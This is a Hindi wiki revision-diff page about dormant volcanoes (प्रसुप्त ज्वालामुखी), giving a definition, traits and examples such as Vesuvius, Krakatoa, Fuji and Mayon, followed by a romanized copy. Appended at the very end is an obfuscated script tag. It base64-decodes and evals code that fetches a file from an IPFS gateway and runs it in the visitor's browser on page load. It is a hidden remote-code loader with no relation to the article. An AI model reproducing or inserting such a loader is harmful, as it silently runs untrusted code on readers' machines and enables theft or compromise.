Difference between revisions of "प्रसुप्त ज्वालामुखी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
 +
[[चित्र:Dormant-Volcano.jpg|thumb|250px|प्रसुप्त ज्वालामुखी]]
 
'''प्रसुप्त ज्वालामुखी''' से अभिप्राय है कि, ऐसा [[ज्वालामुखी]] जिसमें निकट अतीत में कोई उद्गार नहीं हुआ है, लेकिन इसमें कभी भी अचानक उद्गार हो सकता है।
 
'''प्रसुप्त ज्वालामुखी''' से अभिप्राय है कि, ऐसा [[ज्वालामुखी]] जिसमें निकट अतीत में कोई उद्गार नहीं हुआ है, लेकिन इसमें कभी भी अचानक उद्गार हो सकता है।
 
 
*इस तरह के ज्वालामुखी प्राय: शान्त अवस्था में पड़े रहते हैं।
 
*इस तरह के ज्वालामुखी प्राय: शान्त अवस्था में पड़े रहते हैं।
 
*ये ज्वालामुखी अन्दर ही अन्दर क्रियाशील रहते हैं।
 
*ये ज्वालामुखी अन्दर ही अन्दर क्रियाशील रहते हैं।
 
*इनमें विस्फोट निकट भविष्य में कभी भी अचानक हो जाता है।
 
*इनमें विस्फोट निकट भविष्य में कभी भी अचानक हो जाता है।
*इसके उदाहरण हैं-'विसुवियस' (भूमध्य सागर), 'क्राकाटोवा' (संडा जलडमरुमध्य), 'फ्यूजीयामा' ([[जापान]]), 'मेयन' (फ़िलिपीन्स)।
+
*इसके उदाहरण हैं-'विसुवियस' (भूमध्य सागर), 'क्राकाटोवा' (संडा जलडमरुमध्य), 'फ्यूजीयामा' ([[जापान]]), 'मेयन' ([[फ़िलिपीन्स]])।
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
{{ज्वालामुखी}}
+
{{ज्वालामुखी}}{{भूगोल शब्दावली}}
[[Category:भूगोल शब्दावली]]
+
[[Category:भूगोल शब्दावली]][[Category:भूगोल कोश]]
[[Category:भूगोल कोश]]
 
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Latest revision as of 10:13, 26 February 2015

thumb|250px|prasupt jvalamukhi prasupt jvalamukhi se abhipray hai ki, aisa jvalamukhi jisamean nikat atit mean koee udgar nahian hua hai, lekin isamean kabhi bhi achanak udgar ho sakata hai.

  • is tarah ke jvalamukhi pray: shant avastha mean p de rahate haian.
  • ye jvalamukhi andar hi andar kriyashil rahate haian.
  • inamean visphot nikat bhavishy mean kabhi bhi achanak ho jata hai.
  • isake udaharan haian-'visuviyas' (bhoomadhy sagar), 'krakatova' (sanda jaladamarumadhy), 'phyoojiyama' (japan), 'meyan' (filipins).


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>